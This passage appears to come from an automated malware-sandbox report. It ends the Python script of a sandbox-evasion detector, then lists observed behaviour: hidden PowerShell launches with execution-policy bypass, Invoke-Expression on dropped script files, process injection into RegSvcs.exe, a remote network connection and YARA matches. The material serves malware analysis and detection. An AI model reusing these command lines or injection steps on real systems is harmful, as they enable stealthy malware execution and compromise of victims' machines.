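Source: wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File Volume queried: C:\ FullSizeInformation
""".strip().splitlines()


def classify_evasion(lines, sleep_count_threshold=30, sleep_secs_threshold=30_000):
    """Map each matching line to a technique; return {technique: [evidence, ...]}."""
    findings = defaultdict(list)
    for line in lines:
        line = line.rstrip()
        if m := SLEEP_TIME.match(line):
            secs = int(m["secs"])
            if secs >= sleep_secs_threshold:
                kind = "infinite_wait" if secs >= INT64_MS else "long_sleep"
                findings[kind].append((m["src"], int(m["tid"]), secs))
        elif m := SLEEP_COUNT.match(line):
            count = int(m["count"])
            if count > sleep_count_threshold:
                findings["sleep_loop"].append((m["src"], int(m["tid"]), count))
        elif m := MEM_STRING.match(line):
            text = m["text"]
            for needle, product in ARTIFACT_STRINGS.items():
                if needle in text.lower():
                    findings["analysis_artifact_string"].append((m["src"].strip(), product, text))
        elif m := WINDOW.match(line):
            if m["name"] == "WSH-Timer":  # hidden timer window wscript uses for WScript.Sleep
                findings["script_host_sleep"].append((m["src"], m["name"]))
        elif m := RAW_DISK.match(line):
            findings["raw_disk_probe"].append((m["src"], m["dev"]))
        elif m := VOLUME.match(line):
            findings["disk_size_probe"].append((m["src"], m["vol"]))
    return dict(findings)


def score(findings):
    """Sum one weight per technique present."""
    return sum(WEIGHTS.get(k, 0) for k in findings)


if __name__ == "__main__":
    found = classify_evasion(SAMPLE)
    for technique in sorted(found, key=lambda k: -WEIGHTS.get(k, 0)):
        print(f"{technique:26} {found[technique]}")
    print("score:", score(found))
```

The parser keys on the TID-bearing sleep lines rather than the per-process "Thread delayed" rows, because the TID lets you tie a saturated wait to the same thread that later performs the injection; the string table is deliberately lowercase substring matching, which is what the sample actually does when it scans its own memory for SBIEDLL.DLL.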

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Network Connect: 212.23.222.200 222
Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, Native.cs | Reference to suspicious API methods: JtDtnInkGODahNXIQI.OkNXZ9njn(GetProcAddress(LoadLibraryA(ref name), ref method), xIHuvANJJn0kSqvmtF.OkNXZ9njn(typeof(CreateApi).TypeHandle, xIHuvANJJn0kSqvmtF.que2rYFgP), JtDtnInkGODahNXIQI.dHk0ppDBU) (2 occurrences)
Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.cs | Reference to suspicious API methods: Native.WriteProcessMemory(processInformation.ProcessHandle, num6 + num8, array2, array2.Length, ref bytesRead)
Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.cs | Reference to suspicious API methods: Native.ReadProcessMemory(processInformation.ProcessHandle, num16 + 8, ref buffer2, 4, ref bytesRead)
Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.cs | Reference to suspicious API methods: Native.VirtualAllocEx(processInformation.ProcessHandle, num9, length, 12288, 64)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D93008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9F4008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FFF008
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session (3 occurrences)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" " (3 occurrences)
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session (3 occurrences)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'" (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (4 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: Yara match, file source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
